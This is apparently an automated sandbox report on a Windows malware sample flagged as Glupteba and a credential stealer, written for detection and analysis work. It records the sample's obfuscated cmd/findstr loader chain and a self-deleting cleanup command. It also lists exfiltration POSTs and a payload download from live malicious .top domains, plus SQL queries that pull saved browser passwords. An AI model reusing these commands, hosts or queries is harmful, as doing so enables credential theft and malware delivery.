Play interactive tour

Edit tour

Analysis Report 32_64_ver_2_bit.exe

Overview

General Information

Sample Name:	32_64_ver_2_bit.exe
Analysis ID:	382683
MD5:	010d7703a5d4cfea5ea6e9ced6b42eff
SHA1:	e84cc31bfece34b438fea81b149f834db1632df9
SHA256:	0868a2a7b5e276d3a4a40cdef994de934d33d62a689d7207a31fd57d012ef948
Infos:
Most interesting Screenshot:

Detection

Glupteba

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Glupteba

Submitted sample is a known malware sample

Contains functionality to register a low level keyboard hook

Found many strings related to Crypto-Wallets (likely being stolen)

Obfuscated command line found

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate keystroke presses

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

Is looking for software installed on the system

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains strange resources

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

32_64_ver_2_bit.exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\32_64_ver_2_bit.exe' MD5: 010D7703A5D4CFEA5EA6E9CED6B42EFF)

at.exe (PID: 6648 cmdline: 'C:\Windows\System32\at.exe' MD5: 6E495479C0213E98C8141C75807AADC9)

conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6704 cmdline: 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Emergevano.m4a MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6752 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

findstr.exe (PID: 6784 cmdline: findstr /V /R '^rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs$' Giudichera.m4a MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

Male.exe.com (PID: 6800 cmdline: Male.exe.com p MD5: 78BA0653A340BAC5FF152B21A83626CC)

Male.exe.com (PID: 6844 cmdline: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com p MD5: 78BA0653A340BAC5FF152B21A83626CC)

cmd.exe (PID: 5344 cmdline: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\sldDCZXdq & timeout 3 & del /f /q 'C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5868 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

PING.EXE (PID: 6824 cmdline: ping 127.0.0.1 -n 30 MD5: 70C24A306F768936563ABDADB9CA9108)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.485801496.000000000503F000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.268846531.0000000005030000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.486053378.0000000005129000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.486682219.00000000054D1000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	JoeSecurity_Glupteba_1	Yara detected Glupteba	Joe Security
Process Memory Space: Male.exe.com PID: 6844	JoeSecurity_Glupteba_1	Yara detected Glupteba	Joe Security
Process Memory Space: Male.exe.com PID: 6844	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.Male.exe.com.54d0000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Male.exe.com.54d0000.7.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xc59c8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xce5fc:$string2: API call with %s database connection pointer 0xcf1d8:$string3: os_win.c:%d: (%lu) %s(%s) - %s

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://dyhkw15.top/index.phpu	Avira URL Cloud: Label: malware
Source: http://dyhkw15.top/index.phpO	Avira URL Cloud: Label: malware
Source: http://mardxd01.top/index.php	Avira URL Cloud: Label: malware
Source: http://dyhkw15.top/index.php	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: 32_64_ver_2_bit.exe	Virustotal: Detection: 19%			Perma Link
Source: 32_64_ver_2_bit.exe	ReversingLabs: Detection: 16%

Source: 32_64_ver_2_bit.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00409A19 ??2@YAPAXI@Z,FindFirstFileW,FindClose,	0_2_00409A19
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_004044EA FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_004044EA
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040340F FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_0040340F
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040352A FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_0040352A
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_0141E334 GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0141E334

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Temp\sldDCZXdq\files_	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File opened: C:\Users\user\AppData\Local\Temp\sldDCZXdq	Jump to behavior

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30

Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------pFIkyNwAeVaGNdKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: dyhkw15.topContent-Length: 67652Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------RIFYxJPFCSleLABUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: mardxd01.topContent-Length: 67631Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: esmxc01.topConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: esmxc01.topConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: cTUOwSlyoPnUr.cTUOwSlyoPnUr

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------pFIkyNwAeVaGNdKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: dyhkw15.topContent-Length: 67652Cache-Control: no-cache

Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Male.exe.com.7.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Male.exe.com.7.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Male.exe.com.7.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Male.exe.com.7.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	String found in binary or memory: http://dyhkw15.top/index.phpO
Source: Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	String found in binary or memory: http://dyhkw15.top/index.phpu
Source: Male.exe.com, 0000000A.00000002.484370061.000000000402C000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: Male.exe.com, 0000000A.00000002.484370061.000000000402C000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exeF
Source: Male.exe.com, 0000000A.00000002.484428022.0000000004044000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exeltipart/x-byteranges
Source: Male.exe.com, 0000000A.00000002.484370061.000000000402C000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exemA
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exeopenBOOLEANBIT
Source: Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exer
Source: Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	String found in binary or memory: http://mardxd01.top/index.php
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://ocsp.digicert.com0N
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: Male.exe.com.7.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Male.exe.com.7.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Male.exe.com.7.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Male.exe.com.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Male.exe.com.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Male.exe.com, 00000008.00000000.206992204.0000000001485000.00000002.00020000.sdmp, Male.exe.com, 0000000A.00000002.482415694.0000000001485000.00000002.00020000.sdmp, Male.exe.com.7.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://www.avast.com0
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://www.avast.com0/
Source: 32_64_ver_2_bit.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Male.exe.com, 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Male.exe.com.7.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 32_64_ver_2_bit.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: Male.exe.com.7.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Male.exe.com.7.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: cMgIojVP.tmp.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_00408E84 SetWindowsHookExW 00000002,Function_00008E56,00000000,00000000

0_2_00408E84

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Code function: 8_2_013B1976 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

8_2_013B1976

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 10.2.Male.exe.com.54d0000.7.unpack, type: UNPACKEDPE

Matched rule: OlympicDestroyer Payload Author: kevoreilly

Submitted sample is a known malware sample

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Dropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf https://securelist.com/operation-daybreak/75100/https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Data Source: https://github.com/RedDrip7/APT_Digital_Weapon

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00406128	0_2_00406128
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00405811	0_2_00405811
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_004198C3	0_2_004198C3
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_004178D6	0_2_004178D6
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040B230	0_2_0040B230
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_004142CC	0_2_004142CC
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040BA90	0_2_0040BA90
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040F320	0_2_0040F320
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040AB90	0_2_0040AB90
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040EBB8	0_2_0040EBB8
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040B440	0_2_0040B440
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040A4E0	0_2_0040A4E0
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00419551	0_2_00419551
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_00418D50	0_2_00418D50
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040C5F0	0_2_0040C5F0
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0041962B	0_2_0041962B
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_0040A6A0	0_2_0040A6A0
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Code function: 0_2_004127FC	0_2_004127FC
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013EE920	8_2_013EE920
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013D80C7	8_2_013D80C7
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013E6B8B	8_2_013E6B8B
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013B9540	8_2_013B9540
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013D17B4	8_2_013D17B4
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013DE600	8_2_013DE600
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013D7E6A	8_2_013D7E6A
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013B9E80	8_2_013B9E80
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Code function: 8_2_013DCEC0	8_2_013DCEC0

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: String function: 00405041 appears 41 times

Source: 32_64_ver_2_bit.exe

Static PE information: invalid certificate

Source: 32_64_ver_2_bit.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 32_64_ver_2_bit.exe, 00000000.00000002.282005280.0000000002A90000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 32_64_ver_2_bit.exe
Source: 32_64_ver_2_bit.exe, 00000000.00000002.282005280.0000000002A90000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 32_64_ver_2_bit.exe
Source: 32_64_ver_2_bit.exe, 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 32_64_ver_2_bit.exe
Source: 32_64_ver_2_bit.exe, 00000000.00000002.281964315.0000000002A30000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 32_64_ver_2_bit.exe
Source: 32_64_ver_2_bit.exe	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs 32_64_ver_2_bit.exe

Source: 32_64_ver_2_bit.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 10.2.Male.exe.com.54d0000.7.unpack, type: UNPACKEDPE

Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/24@4/5

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_0040976C wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_0040976C

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_00402446 GetDiskFreeSpaceExW,SendMessageW,

0_2_00402446

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_004048CC _wtol,_wtol,SHGetSpecialFolderPathW,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_004048CC

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Code function: 0_2_004039F0 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,

0_2_004039F0

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

File created: C:\Users\user\AppData\Roaming\uAVhoZXwkG

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_01

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

File created: C:\Users\user\AppData\Local\Temp\RYyYId

Jump to behavior

Source: 32_64_ver_2_bit.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: SELECT a11, a102 FROM nssPrivate;
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: SELECT item1, item2 FROM metadata WHERE id = 'password';
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: Male.exe.com, 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: 32_64_ver_2_bit.exe	Virustotal: Detection: 19%
Source: 32_64_ver_2_bit.exe	ReversingLabs: Detection: 16%

Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe

File read: C:\Users\user\Desktop\32_64_ver_2_bit.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\32_64_ver_2_bit.exe 'C:\Users\user\Desktop\32_64_ver_2_bit.exe'
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Process created: C:\Windows\SysWOW64\at.exe 'C:\Windows\System32\at.exe'
Source: C:\Windows\SysWOW64\at.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\32_64_ver_2_bit.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Emergevano.m4a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs$' Giudichera.m4a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com Male.exe.com p
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com	Process created: C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com p
